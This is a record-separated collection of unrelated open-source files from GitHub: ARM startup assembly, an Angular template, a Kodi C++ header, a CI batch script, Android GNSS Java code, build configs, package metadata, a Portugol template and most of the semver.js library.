; and heap memory locations.  For the C library version of the startup code,
; provide this function so that the C library initialization code can find out
; the location of the stack and heap.
;
;******************************************************************************
    IF :DEF: __MICROLIB
        EXPORT  __initial_sp
        EXPORT  __heap_base
        EXPORT  __heap_limit
    ELSE
        IMPORT  __use_two_region_memory
        EXPORT  __user_initial_stackheap
__user_initial_stackheap
        ; Two-region model return values:
        ; R0 = heap base, R1 = stack top, R2 = heap limit, R3 = stack base.
        LDR     R0, =HeapMem
        LDR     R1, =(StackMem + Stack)
        LDR     R2, =(HeapMem + Heap)
        LDR     R3, =StackMem
        BX      LR
    ENDIF
;******************************************************************************
;
; Make sure the end of this section is aligned.
;
;******************************************************************************
ALIGN
;******************************************************************************
;
; Tell the assembler that we're done.
;
;******************************************************************************
END
| {
"pile_set_name": "Github"
} |
<!-- Demo page layout: GitHub corner ribbon, header, then a two-column row.
     The #options template reference exposes the options component's state,
     and the table's [loading] input is bound to options.data. -->
<github-corner></github-corner>
<demo-header></demo-header>
<div class="container">
  <div class="row">
    <div class="col-sm-4">
      <demo-options #options></demo-options>
    </div>
    <div class="col-sm-offset-1 col-sm-7">
      <demo-table [loading]="options.data"></demo-table>
    </div>
  </div>
</div>
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2010-2018 Team Kodi
* This file is part of Kodi - https://kodi.tv
*
* SPDX-License-Identifier: GPL-2.0-or-later
* See LICENSES/README.md for more information.
*/
#pragma once
#include "cores/AudioEngine/Interfaces/AEResample.h"
// NOTE(review): this forward declaration is redundant — AEResample.h included
// above already declares IAEResample; kept as-is for compatibility.
class IAEResample;
namespace ActiveAE
{
/**
 * Bit options to pass to CAEResampleFactory::Create
 */
enum AEResampleFactoryOptions
{
  /* This is a quick resample job (e.g. resample a single noise packet) and may not be worth using GPU acceleration */
  AERESAMPLEFACTORY_QUICK_RESAMPLE = 0x01
};
/**
 * Factory that instantiates the platform-appropriate IAEResample
 * implementation.
 */
class CAEResampleFactory
{
public:
  /**
   * Create a resampler instance.
   * \param flags bitwise OR of AEResampleFactoryOptions (0 = default behavior)
   * \return pointer to a new resampler; presumably the caller takes ownership
   *         and must delete it — confirm against the implementation.
   */
  static IAEResample *Create(uint32_t flags = 0U);
};
}
| {
"pile_set_name": "Github"
} |
:: CI helper: restore public GitHub access, then run the MSYS2 preparation script.
@echo on
:: Unset CircleCI default setting that prevents pulling Styrene from the public repo
git config --global --unset url."ssh://[email protected]".insteadOf "https://github.com"
:: Run Env preparation script in verbose mode (echo on)
:: (%~dp0 = directory of this script, so the path is repo-relative)
call "%~dp0..\..\scripts\windows\msys2_prepare" -v
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2014 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.server.location;
import android.content.Context;
import android.location.GnssMeasurementsEvent;
import android.location.IGnssMeasurementsListener;
import android.os.Handler;
import android.os.RemoteException;
import android.provider.Settings;
import android.util.Log;
import com.android.internal.annotations.VisibleForTesting;
/**
* An base implementation for GPS measurements provider. It abstracts out the responsibility of
* handling listeners, while still allowing technology specific implementations to be built.
*
* @hide
*/
public abstract class GnssMeasurementsProvider
extends RemoteListenerHelper<IGnssMeasurementsListener> {
private static final String TAG = "GnssMeasurementsProvider";
private static final boolean DEBUG = Log.isLoggable(TAG, Log.DEBUG);
private final GnssMeasurementProviderNative mNative;
private boolean mIsCollectionStarted;
private boolean mEnableFullTracking;
protected GnssMeasurementsProvider(Context context, Handler handler) {
this(context, handler, new GnssMeasurementProviderNative());
}
@VisibleForTesting
GnssMeasurementsProvider(
Context context, Handler handler, GnssMeasurementProviderNative aNative) {
super(context, handler, TAG);
mNative = aNative;
}
void resumeIfStarted() {
if (DEBUG) {
Log.d(TAG, "resumeIfStarted");
}
if (mIsCollectionStarted) {
mNative.startMeasurementCollection(mEnableFullTracking);
}
}
@Override
public boolean isAvailableInPlatform() {
return mNative.isMeasurementSupported();
}
@Override
protected int registerWithService() {
int devOptions = Settings.Secure.getInt(mContext.getContentResolver(),
Settings.Global.DEVELOPMENT_SETTINGS_ENABLED, 0);
int fullTrackingToggled = Settings.Global.getInt(mContext.getContentResolver(),
Settings.Global.ENABLE_GNSS_RAW_MEAS_FULL_TRACKING, 0);
boolean enableFullTracking = (devOptions == 1 /* Developer Mode enabled */)
&& (fullTrackingToggled == 1 /* Raw Measurements Full Tracking enabled */);
boolean result = mNative.startMeasurementCollection(enableFullTracking);
if (result) {
mIsCollectionStarted = true;
mEnableFullTracking = enableFullTracking;
return RemoteListenerHelper.RESULT_SUCCESS;
} else {
return RemoteListenerHelper.RESULT_INTERNAL_ERROR;
}
}
@Override
protected void unregisterFromService() {
boolean stopped = mNative.stopMeasurementCollection();
if (stopped) {
mIsCollectionStarted = false;
}
}
public void onMeasurementsAvailable(final GnssMeasurementsEvent event) {
foreach((IGnssMeasurementsListener listener, CallerIdentity callerIdentity) -> {
if (!hasPermission(mContext, callerIdentity)) {
logPermissionDisabledEventNotReported(
TAG, callerIdentity.mPackageName, "GNSS measurements");
return;
}
listener.onGnssMeasurementsReceived(event);
});
}
/** Handle GNSS capabilities update from the GNSS HAL implementation. */
public void onCapabilitiesUpdated(boolean isGnssMeasurementsSupported) {
setSupported(isGnssMeasurementsSupported);
updateResult();
}
public void onGpsEnabledChanged() {
tryUpdateRegistrationWithService();
updateResult();
}
@Override
protected ListenerOperation<IGnssMeasurementsListener> getHandlerOperation(int result) {
int status;
switch (result) {
case RESULT_SUCCESS:
status = GnssMeasurementsEvent.Callback.STATUS_READY;
break;
case RESULT_NOT_AVAILABLE:
case RESULT_NOT_SUPPORTED:
case RESULT_INTERNAL_ERROR:
status = GnssMeasurementsEvent.Callback.STATUS_NOT_SUPPORTED;
break;
case RESULT_NOT_ALLOWED:
status = GnssMeasurementsEvent.Callback.STATUS_NOT_ALLOWED;
break;
case RESULT_GPS_LOCATION_DISABLED:
status = GnssMeasurementsEvent.Callback.STATUS_LOCATION_DISABLED;
break;
case RESULT_UNKNOWN:
return null;
default:
Log.v(TAG, "Unhandled addListener result: " + result);
return null;
}
return new StatusChangedOperation(status);
}
private static class StatusChangedOperation
implements ListenerOperation<IGnssMeasurementsListener> {
private final int mStatus;
public StatusChangedOperation(int status) {
mStatus = status;
}
@Override
public void execute(IGnssMeasurementsListener listener,
CallerIdentity callerIdentity) throws RemoteException {
listener.onStatusChanged(mStatus);
}
}
@VisibleForTesting
static class GnssMeasurementProviderNative {
public boolean isMeasurementSupported() {
return native_is_measurement_supported();
}
public boolean startMeasurementCollection(boolean enableFullTracking) {
return native_start_measurement_collection(enableFullTracking);
}
public boolean stopMeasurementCollection() {
return native_stop_measurement_collection();
}
}
private static native boolean native_is_measurement_supported();
private static native boolean native_start_measurement_collection(boolean enableFullTracking);
private static native boolean native_stop_measurement_collection();
}
| {
"pile_set_name": "Github"
} |
# #############################################################################
# Generic
# #############################################################################
# Build with -g -O0 (set to y for debug builds)
debug = n
# Echo the build commands (set to y for verbose output)
verbose = n
# #############################################################################
# Click specific
# #############################################################################
# Build extra element groups under elements (space-separated list; empty = none)
CLICK_EXTRA_ELEMENT_GROUPS =
# #############################################################################
# MiniOS specific
# #############################################################################
## Configure netfront to use netmap
# Enable netmap
CONFIG_NETMAP = y
# Pick the netmap version
CONFIG_NETMAP_API = 10
# Enable blocking poll
CONFIG_NETFRONT_POLL = y
# Poll timeout
# NOTE(review): unit not stated here — confirm against the netfront sources.
CONFIG_NETFRONT_POLLTIMEOUT = 10000
| {
"pile_set_name": "Github"
} |
{
"_args": [
[
{
"name": "css-what",
"raw": "[email protected]",
"rawSpec": "2.1",
"scope": null,
"spec": ">=2.1.0 <2.2.0",
"type": "range"
},
"/Users/yangcs/bin/prometheus-handbook/node_modules/gitbook-plugin-image-captions/node_modules/css-select"
]
],
"_cnpm_publish_time": 1448198714930,
"_from": "css-what@>=2.1.0 <2.2.0",
"_hasShrinkwrap": false,
"_id": "[email protected]",
"_inCache": true,
"_installable": true,
"_location": "/gitbook-plugin-image-captions/css-what",
"_nodeVersion": "5.0.0",
"_npmUser": {
"email": "[email protected]",
"name": "feedic"
},
"_npmVersion": "3.3.9",
"_phantomChildren": {},
"_requested": {
"name": "css-what",
"raw": "[email protected]",
"rawSpec": "2.1",
"scope": null,
"spec": ">=2.1.0 <2.2.0",
"type": "range"
},
"_requiredBy": [
"/gitbook-plugin-image-captions/css-select"
],
"_resolved": "https://registry.npm.taobao.org/css-what/download/css-what-2.1.0.tgz",
"_shasum": "9467d032c38cfaefb9f2d79501253062f87fa1bd",
"_shrinkwrap": null,
"_spec": "[email protected]",
"_where": "/Users/yangcs/bin/prometheus-handbook/node_modules/gitbook-plugin-image-captions/node_modules/css-select",
"author": {
"email": "[email protected]",
"name": "Felix Böhm",
"url": "http://feedic.com"
},
"bugs": {
"url": "https://github.com/fb55/css-what/issues"
},
"dependencies": {},
"description": "a CSS selector parser",
"devDependencies": {
"jshint": "2"
},
"directories": {},
"dist": {
"shasum": "9467d032c38cfaefb9f2d79501253062f87fa1bd",
"tarball": "https://registry.npmjs.org/css-what/-/css-what-2.1.0.tgz"
},
"engines": {
"node": "*"
},
"files": [
"index.js"
],
"gitHead": "fd6b9f62146efec8e17ee80ddaebdfb6ede21d7b",
"homepage": "https://github.com/fb55/css-what#readme",
"jshintConfig": {
"eqeqeq": true,
"eqnull": true,
"freeze": true,
"globals": {
"describe": true,
"it": true
},
"latedef": "nofunc",
"noarg": true,
"node": true,
"nonbsp": true,
"proto": true,
"quotmark": "double",
"smarttabs": true,
"trailing": true,
"undef": true,
"unused": true
},
"license": "BSD-like",
"main": "./index.js",
"maintainers": [
{
"email": "[email protected]",
"name": "feedic"
}
],
"name": "css-what",
"optionalDependencies": {},
"readme": "ERROR: No README data found!",
"repository": {
"url": "git+https://github.com/fb55/css-what.git"
},
"scripts": {
"test": "node tests/test.js && jshint *.js"
},
"version": "2.1.0"
}
| {
"pile_set_name": "Github"
} |
oslo.cache aims to provide a generic caching mechanism for OpenStack projects
by wrapping the dogpile.cache library. The dogpile.cache library provides
support for memoization, key-value storage, and interfaces to common caching
backends such as Memcached.
WWW: https://docs.openstack.org/oslo.cache/latest/
WWW: https://github.com/openstack/oslo.cache
| {
"pile_set_name": "Github"
} |
/* CLIQUE NO SINAL DE "+", À ESQUERDA, PARA EXIBIR A DESCRIÇÃO DO EXEMPLO
*
* Copyright (C) 2014 - UNIVALI - Universidade do Vale do Itajaí
*
* Este arquivo de código fonte é livre para utilização, cópia e/ou modificação
* desde que este cabeçalho, contendo os direitos autorais e a descrição do programa,
* seja mantido.
*
* Se tiver dificuldade em compreender este exemplo, acesse as vídeoaulas do Portugol
* Studio para auxiliá-lo:
*
* https://www.youtube.com/watch?v=K02TnB3IGnQ&list=PLb9yvNDCid3jQAEbNoPHtPR0SWwmRSM-t
*
* Descrição:
*
*
*
* Autores:
*
* Luiz Fernando Noschang ([email protected])
*
* Data: 18/07/2014
*/
programa
{
	// Program entry point (runs when the program starts); intentionally empty —
	// this example file is a blank template for students to fill in.
	funcao inicio()
	{
	}
}
/* $$$ Portugol Studio $$$
*
* Esta seção do arquivo guarda informações do Portugol Studio.
* Você pode apagá-la se estiver utilizando outro editor.
*
* @POSICAO-CURSOR = 568;
*/ | {
"pile_set_name": "Github"
} |
exports = module.exports = SemVer
// debug() logs to the console only when NODE_DEBUG mentions "semver";
// otherwise it is a no-op, so debug calls are free in production.
var debug
/* istanbul ignore next */
if (typeof process === 'object' &&
    process.env &&
    process.env.NODE_DEBUG &&
    /\bsemver\b/i.test(process.env.NODE_DEBUG)) {
  debug = function () {
    var args = Array.prototype.slice.call(arguments, 0)
    args.unshift('SEMVER')
    console.log.apply(console, args)
  }
} else {
  debug = function () {}
}
// Note: this is the semver.org version of the spec that it implements
// Not necessarily the package version of this code.
exports.SEMVER_SPEC_VERSION = '2.0.0'
var MAX_LENGTH = 256
var MAX_SAFE_INTEGER = Number.MAX_SAFE_INTEGER ||
  /* istanbul ignore next */ 9007199254740991
// Max safe segment length for coercion.
var MAX_SAFE_COMPONENT_LENGTH = 16
// The actual regexps go on exports.re
var re = exports.re = []
var src = exports.src = []
var t = exports.tokens = {}
var R = 0
// tok(name) assigns the next sequential token id to t[name]; src[id] later
// receives the regex source text and re[id] the compiled RegExp.
function tok (n) {
  t[n] = R++
}
// The following Regular Expressions can be used for tokenizing,
// validating, and parsing SemVer version strings.
// (Order matters: later patterns are built by string-concatenating earlier
// ones, so these tok()/src[] assignments must not be reordered.)
// ## Numeric Identifier
// A single `0`, or a non-zero digit followed by zero or more digits.
tok('NUMERICIDENTIFIER')
src[t.NUMERICIDENTIFIER] = '0|[1-9]\\d*'
tok('NUMERICIDENTIFIERLOOSE')
src[t.NUMERICIDENTIFIERLOOSE] = '[0-9]+'
// ## Non-numeric Identifier
// Zero or more digits, followed by a letter or hyphen, and then zero or
// more letters, digits, or hyphens.
tok('NONNUMERICIDENTIFIER')
src[t.NONNUMERICIDENTIFIER] = '\\d*[a-zA-Z-][a-zA-Z0-9-]*'
// ## Main Version
// Three dot-separated numeric identifiers.
tok('MAINVERSION')
src[t.MAINVERSION] = '(' + src[t.NUMERICIDENTIFIER] + ')\\.' +
                     '(' + src[t.NUMERICIDENTIFIER] + ')\\.' +
                     '(' + src[t.NUMERICIDENTIFIER] + ')'
tok('MAINVERSIONLOOSE')
src[t.MAINVERSIONLOOSE] = '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' +
                          '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' +
                          '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')'
// ## Pre-release Version Identifier
// A numeric identifier, or a non-numeric identifier.
tok('PRERELEASEIDENTIFIER')
src[t.PRERELEASEIDENTIFIER] = '(?:' + src[t.NUMERICIDENTIFIER] +
                              '|' + src[t.NONNUMERICIDENTIFIER] + ')'
tok('PRERELEASEIDENTIFIERLOOSE')
src[t.PRERELEASEIDENTIFIERLOOSE] = '(?:' + src[t.NUMERICIDENTIFIERLOOSE] +
                                   '|' + src[t.NONNUMERICIDENTIFIER] + ')'
// ## Pre-release Version
// Hyphen, followed by one or more dot-separated pre-release version
// identifiers.
tok('PRERELEASE')
src[t.PRERELEASE] = '(?:-(' + src[t.PRERELEASEIDENTIFIER] +
                    '(?:\\.' + src[t.PRERELEASEIDENTIFIER] + ')*))'
tok('PRERELEASELOOSE')
src[t.PRERELEASELOOSE] = '(?:-?(' + src[t.PRERELEASEIDENTIFIERLOOSE] +
                         '(?:\\.' + src[t.PRERELEASEIDENTIFIERLOOSE] + ')*))'
// ## Build Metadata Identifier
// Any combination of digits, letters, or hyphens.
tok('BUILDIDENTIFIER')
src[t.BUILDIDENTIFIER] = '[0-9A-Za-z-]+'
// ## Build Metadata
// Plus sign, followed by one or more period-separated build metadata
// identifiers.
tok('BUILD')
src[t.BUILD] = '(?:\\+(' + src[t.BUILDIDENTIFIER] +
               '(?:\\.' + src[t.BUILDIDENTIFIER] + ')*))'
// ## Full Version String
// A main version, followed optionally by a pre-release version and
// build metadata.
// Note that the only major, minor, patch, and pre-release sections of
// the version string are capturing groups. The build metadata is not a
// capturing group, because it should not ever be used in version
// comparison.
tok('FULL')
tok('FULLPLAIN')
src[t.FULLPLAIN] = 'v?' + src[t.MAINVERSION] +
                   src[t.PRERELEASE] + '?' +
                   src[t.BUILD] + '?'
src[t.FULL] = '^' + src[t.FULLPLAIN] + '$'
// like full, but allows v1.2.3 and =1.2.3, which people do sometimes.
// also, 1.0.0alpha1 (prerelease without the hyphen) which is pretty
// common in the npm registry.
tok('LOOSEPLAIN')
src[t.LOOSEPLAIN] = '[v=\\s]*' + src[t.MAINVERSIONLOOSE] +
                    src[t.PRERELEASELOOSE] + '?' +
                    src[t.BUILD] + '?'
tok('LOOSE')
src[t.LOOSE] = '^' + src[t.LOOSEPLAIN] + '$'
tok('GTLT')
src[t.GTLT] = '((?:<|>)?=?)'
// Something like "2.*" or "1.2.x".
// Note that "x.x" is a valid xRange identifer, meaning "any version"
// Only the first item is strictly required.
tok('XRANGEIDENTIFIERLOOSE')
src[t.XRANGEIDENTIFIERLOOSE] = src[t.NUMERICIDENTIFIERLOOSE] + '|x|X|\\*'
tok('XRANGEIDENTIFIER')
src[t.XRANGEIDENTIFIER] = src[t.NUMERICIDENTIFIER] + '|x|X|\\*'
tok('XRANGEPLAIN')
src[t.XRANGEPLAIN] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIER] + ')' +
                     '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' +
                     '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' +
                     '(?:' + src[t.PRERELEASE] + ')?' +
                     src[t.BUILD] + '?' +
                     ')?)?'
tok('XRANGEPLAINLOOSE')
src[t.XRANGEPLAINLOOSE] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' +
                          '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' +
                          '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' +
                          '(?:' + src[t.PRERELEASELOOSE] + ')?' +
                          src[t.BUILD] + '?' +
                          ')?)?'
tok('XRANGE')
src[t.XRANGE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAIN] + '$'
tok('XRANGELOOSE')
src[t.XRANGELOOSE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAINLOOSE] + '$'
// Coercion.
// Extract anything that could conceivably be a part of a valid semver
tok('COERCE')
src[t.COERCE] = '(^|[^\\d])' +
              '(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '})' +
              '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' +
              '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' +
              '(?:$|[^\\d])'
tok('COERCERTL')
// (compiled eagerly with the global flag, used for right-to-left coercion scans)
re[t.COERCERTL] = new RegExp(src[t.COERCE], 'g')
// Tilde ranges.
// Meaning is "reasonably at or greater than"
tok('LONETILDE')
src[t.LONETILDE] = '(?:~>?)'
tok('TILDETRIM')
src[t.TILDETRIM] = '(\\s*)' + src[t.LONETILDE] + '\\s+'
re[t.TILDETRIM] = new RegExp(src[t.TILDETRIM], 'g')
var tildeTrimReplace = '$1~'
tok('TILDE')
src[t.TILDE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAIN] + '$'
tok('TILDELOOSE')
src[t.TILDELOOSE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAINLOOSE] + '$'
// Caret ranges.
// Meaning is "at least and backwards compatible with"
tok('LONECARET')
src[t.LONECARET] = '(?:\\^)'
tok('CARETTRIM')
src[t.CARETTRIM] = '(\\s*)' + src[t.LONECARET] + '\\s+'
re[t.CARETTRIM] = new RegExp(src[t.CARETTRIM], 'g')
var caretTrimReplace = '$1^'
tok('CARET')
src[t.CARET] = '^' + src[t.LONECARET] + src[t.XRANGEPLAIN] + '$'
tok('CARETLOOSE')
src[t.CARETLOOSE] = '^' + src[t.LONECARET] + src[t.XRANGEPLAINLOOSE] + '$'
// A simple gt/lt/eq thing, or just "" to indicate "any version"
tok('COMPARATORLOOSE')
src[t.COMPARATORLOOSE] = '^' + src[t.GTLT] + '\\s*(' + src[t.LOOSEPLAIN] + ')$|^$'
tok('COMPARATOR')
src[t.COMPARATOR] = '^' + src[t.GTLT] + '\\s*(' + src[t.FULLPLAIN] + ')$|^$'
// An expression to strip any whitespace between the gtlt and the thing
// it modifies, so that `> 1.2.3` ==> `>1.2.3`
tok('COMPARATORTRIM')
src[t.COMPARATORTRIM] = '(\\s*)' + src[t.GTLT] +
                        '\\s*(' + src[t.LOOSEPLAIN] + '|' + src[t.XRANGEPLAIN] + ')'
// this one has to use the /g flag
re[t.COMPARATORTRIM] = new RegExp(src[t.COMPARATORTRIM], 'g')
var comparatorTrimReplace = '$1$2$3'
// Something like `1.2.3 - 1.2.4`
// Note that these all use the loose form, because they'll be
// checked against either the strict or loose comparator form
// later.
tok('HYPHENRANGE')
src[t.HYPHENRANGE] = '^\\s*(' + src[t.XRANGEPLAIN] + ')' +
                     '\\s+-\\s+' +
                     '(' + src[t.XRANGEPLAIN] + ')' +
                     '\\s*$'
tok('HYPHENRANGELOOSE')
src[t.HYPHENRANGELOOSE] = '^\\s*(' + src[t.XRANGEPLAINLOOSE] + ')' +
                          '\\s+-\\s+' +
                          '(' + src[t.XRANGEPLAINLOOSE] + ')' +
                          '\\s*$'
// Star ranges basically just allow anything at all.
tok('STAR')
src[t.STAR] = '(<|>)?=?\\s*\\*'
// Compile to actual regexp objects.
// All are flag-free, unless they were created above with a flag.
for (var i = 0; i < R; i++) {
  debug(i, src[i])
  if (!re[i]) {
    re[i] = new RegExp(src[i])
  }
}
exports.parse = parse

/**
 * Attempt to parse `version` into a SemVer instance.
 * Returns the SemVer (or `version` itself when it already is one), or null
 * when the input is not a valid semver string under the given options.
 */
function parse (version, options) {
  if (!options || typeof options !== 'object') {
    options = {
      loose: !!options,
      includePrerelease: false
    }
  }

  if (version instanceof SemVer) {
    return version
  }

  // Reject non-strings and absurdly long inputs up front.
  if (typeof version !== 'string' || version.length > MAX_LENGTH) {
    return null
  }

  var pattern = options.loose ? re[t.LOOSE] : re[t.FULL]
  if (!pattern.test(version)) {
    return null
  }

  try {
    return new SemVer(version, options)
  } catch (er) {
    return null
  }
}
exports.valid = valid

// Return the normalized version string, or null if `version` doesn't parse.
function valid (version, options) {
  var parsed = parse(version, options)
  return parsed === null ? null : parsed.version
}

exports.clean = clean

// Like valid(), but first strips surrounding whitespace and any leading
// '=' / 'v' characters (e.g. "  =v1.2.3  " -> "1.2.3").
function clean (version, options) {
  var parsed = parse(version.trim().replace(/^[=v]+/, ''), options)
  return parsed === null ? null : parsed.version
}
exports.SemVer = SemVer
// SemVer constructor: parses `version` into major/minor/patch, prerelease
// identifiers, and build metadata. Throws TypeError on invalid input.
// Works with or without `new`, and returns an existing instance unchanged
// when the looseness matches.
function SemVer (version, options) {
  if (!options || typeof options !== 'object') {
    options = {
      loose: !!options,
      includePrerelease: false
    }
  }
  if (version instanceof SemVer) {
    // Reuse the instance when looseness matches; otherwise reparse its string.
    if (version.loose === options.loose) {
      return version
    } else {
      version = version.version
    }
  } else if (typeof version !== 'string') {
    throw new TypeError('Invalid Version: ' + version)
  }
  if (version.length > MAX_LENGTH) {
    throw new TypeError('version is longer than ' + MAX_LENGTH + ' characters')
  }
  if (!(this instanceof SemVer)) {
    return new SemVer(version, options)
  }
  debug('SemVer', version, options)
  this.options = options
  this.loose = !!options.loose
  var m = version.trim().match(options.loose ? re[t.LOOSE] : re[t.FULL])
  if (!m) {
    throw new TypeError('Invalid Version: ' + version)
  }
  this.raw = version
  // these are actually numbers
  this.major = +m[1]
  this.minor = +m[2]
  this.patch = +m[3]
  if (this.major > MAX_SAFE_INTEGER || this.major < 0) {
    throw new TypeError('Invalid major version')
  }
  if (this.minor > MAX_SAFE_INTEGER || this.minor < 0) {
    throw new TypeError('Invalid minor version')
  }
  if (this.patch > MAX_SAFE_INTEGER || this.patch < 0) {
    throw new TypeError('Invalid patch version')
  }
  // numberify any prerelease numeric ids
  if (!m[4]) {
    this.prerelease = []
  } else {
    this.prerelease = m[4].split('.').map(function (id) {
      if (/^[0-9]+$/.test(id)) {
        var num = +id
        // Keep as a string if it would overflow the safe-integer range.
        if (num >= 0 && num < MAX_SAFE_INTEGER) {
          return num
        }
      }
      return id
    })
  }
  // Build metadata is kept as strings; it never participates in precedence.
  this.build = m[5] ? m[5].split('.') : []
  this.format()
}
// Rebuild and cache the canonical version string from the parsed parts.
SemVer.prototype.format = function () {
  var formatted = this.major + '.' + this.minor + '.' + this.patch
  if (this.prerelease.length) {
    formatted += '-' + this.prerelease.join('.')
  }
  this.version = formatted
  return formatted
}

SemVer.prototype.toString = function () {
  return this.version
}

// Full precedence comparison: main version first, prerelease as tie-breaker.
SemVer.prototype.compare = function (other) {
  debug('SemVer.compare', this.version, this.options, other)
  var that = other instanceof SemVer ? other : new SemVer(other, this.options)
  return this.compareMain(that) || this.comparePre(that)
}
// Compare only the major.minor.patch portion of two versions.
SemVer.prototype.compareMain = function (other) {
  if (!(other instanceof SemVer)) {
    other = new SemVer(other, this.options)
  }
  return compareIdentifiers(this.major, other.major) ||
    compareIdentifiers(this.minor, other.minor) ||
    compareIdentifiers(this.patch, other.patch)
}
// Compare the prerelease portions per SemVer precedence rules:
// a version with no prerelease ranks higher than one with a prerelease,
// otherwise identifiers are compared pairwise left to right.
SemVer.prototype.comparePre = function (other) {
  if (!(other instanceof SemVer)) {
    other = new SemVer(other, this.options)
  }
  // NOT having a prerelease is > having one
  if (this.prerelease.length && !other.prerelease.length) {
    return -1
  } else if (!this.prerelease.length && other.prerelease.length) {
    return 1
  } else if (!this.prerelease.length && !other.prerelease.length) {
    return 0
  }
  // Walk identifier pairs; the shorter list loses when all shared
  // identifiers are equal. The loop always exits via a return.
  var i = 0
  do {
    var a = this.prerelease[i]
    var b = other.prerelease[i]
    debug('prerelease compare', i, a, b)
    if (a === undefined && b === undefined) {
      return 0
    } else if (b === undefined) {
      return 1
    } else if (a === undefined) {
      return -1
    } else if (a === b) {
      continue
    } else {
      return compareIdentifiers(a, b)
    }
  } while (++i)
}
// Compare build metadata identifier-by-identifier. SemVer precedence ignores
// build metadata; this is only a deterministic tie-breaker (used by sort()).
// A version with fewer build identifiers sorts lower when the shared ones match.
SemVer.prototype.compareBuild = function (other) {
  if (!(other instanceof SemVer)) {
    other = new SemVer(other, this.options)
  }
  var i = 0
  do {
    var a = this.build[i]
    var b = other.build[i]
    // Fixed: this debug label previously read 'prerelease compare' (copy-paste
    // from comparePre), which made debug traces misleading.
    debug('build compare', i, a, b)
    if (a === undefined && b === undefined) {
      return 0
    } else if (b === undefined) {
      return 1
    } else if (a === undefined) {
      return -1
    } else if (a === b) {
      continue
    } else {
      return compareIdentifiers(a, b)
    }
  } while (++i)
}
// preminor will bump the version up to the next minor release, and immediately
// down to pre-release. premajor and prepatch work the same way.
// inc() mutates this instance in place and returns it; throws on an
// unknown release type. `identifier` names the prerelease tag to use
// (e.g. 'beta' -> 1.2.3-beta.0).
SemVer.prototype.inc = function (release, identifier) {
  switch (release) {
    case 'premajor':
      this.prerelease.length = 0
      this.patch = 0
      this.minor = 0
      this.major++
      this.inc('pre', identifier)
      break
    case 'preminor':
      this.prerelease.length = 0
      this.patch = 0
      this.minor++
      this.inc('pre', identifier)
      break
    case 'prepatch':
      // If this is already a prerelease, it will bump to the next version
      // drop any prereleases that might already exist, since they are not
      // relevant at this point.
      this.prerelease.length = 0
      this.inc('patch', identifier)
      this.inc('pre', identifier)
      break
    // If the input is a non-prerelease version, this acts the same as
    // prepatch.
    case 'prerelease':
      if (this.prerelease.length === 0) {
        this.inc('patch', identifier)
      }
      this.inc('pre', identifier)
      break
    case 'major':
      // If this is a pre-major version, bump up to the same major version.
      // Otherwise increment major.
      // 1.0.0-5 bumps to 1.0.0
      // 1.1.0 bumps to 2.0.0
      if (this.minor !== 0 ||
          this.patch !== 0 ||
          this.prerelease.length === 0) {
        this.major++
      }
      this.minor = 0
      this.patch = 0
      this.prerelease = []
      break
    case 'minor':
      // If this is a pre-minor version, bump up to the same minor version.
      // Otherwise increment minor.
      // 1.2.0-5 bumps to 1.2.0
      // 1.2.1 bumps to 1.3.0
      if (this.patch !== 0 || this.prerelease.length === 0) {
        this.minor++
      }
      this.patch = 0
      this.prerelease = []
      break
    case 'patch':
      // If this is not a pre-release version, it will increment the patch.
      // If it is a pre-release it will bump up to the same patch version.
      // 1.2.0-5 patches to 1.2.0
      // 1.2.0 patches to 1.2.1
      if (this.prerelease.length === 0) {
        this.patch++
      }
      this.prerelease = []
      break
    // This probably shouldn't be used publicly.
    // 1.0.0 "pre" would become 1.0.0-0 which is the wrong direction.
    case 'pre':
      if (this.prerelease.length === 0) {
        this.prerelease = [0]
      } else {
        // Increment the right-most numeric prerelease identifier;
        // i ends at -2 when one was bumped, -1 when none was found.
        var i = this.prerelease.length
        while (--i >= 0) {
          if (typeof this.prerelease[i] === 'number') {
            this.prerelease[i]++
            i = -2
          }
        }
        if (i === -1) {
          // didn't increment anything
          this.prerelease.push(0)
        }
      }
      if (identifier) {
        // 1.2.0-beta.1 bumps to 1.2.0-beta.2,
        // 1.2.0-beta.fooblz or 1.2.0-beta bumps to 1.2.0-beta.0
        if (this.prerelease[0] === identifier) {
          if (isNaN(this.prerelease[1])) {
            this.prerelease = [identifier, 0]
          }
        } else {
          this.prerelease = [identifier, 0]
        }
      }
      break
    default:
      throw new Error('invalid increment argument: ' + release)
  }
  this.format()
  this.raw = this.version
  return this
}
exports.inc = inc

// Bump `version` by the given release type and return the new version string,
// or null when the input is invalid. The third argument may be the prerelease
// identifier when `loose` is omitted (legacy calling convention).
function inc (version, release, loose, identifier) {
  if (typeof loose === 'string') {
    // legacy signature: inc(version, release, identifier)
    identifier = loose
    loose = undefined
  }

  try {
    var bumped = new SemVer(version, loose)
    return bumped.inc(release, identifier).version
  } catch (err) {
    return null
  }
}
exports.diff = diff

// Return which part differs between two versions: 'major'/'minor'/'patch',
// prefixed with 'pre' when either side carries a prerelease tag, 'prerelease'
// when only the prerelease differs, or null when the versions are equal.
// (May return undefined for differences not covered by those categories —
// behavior preserved from the original implementation.)
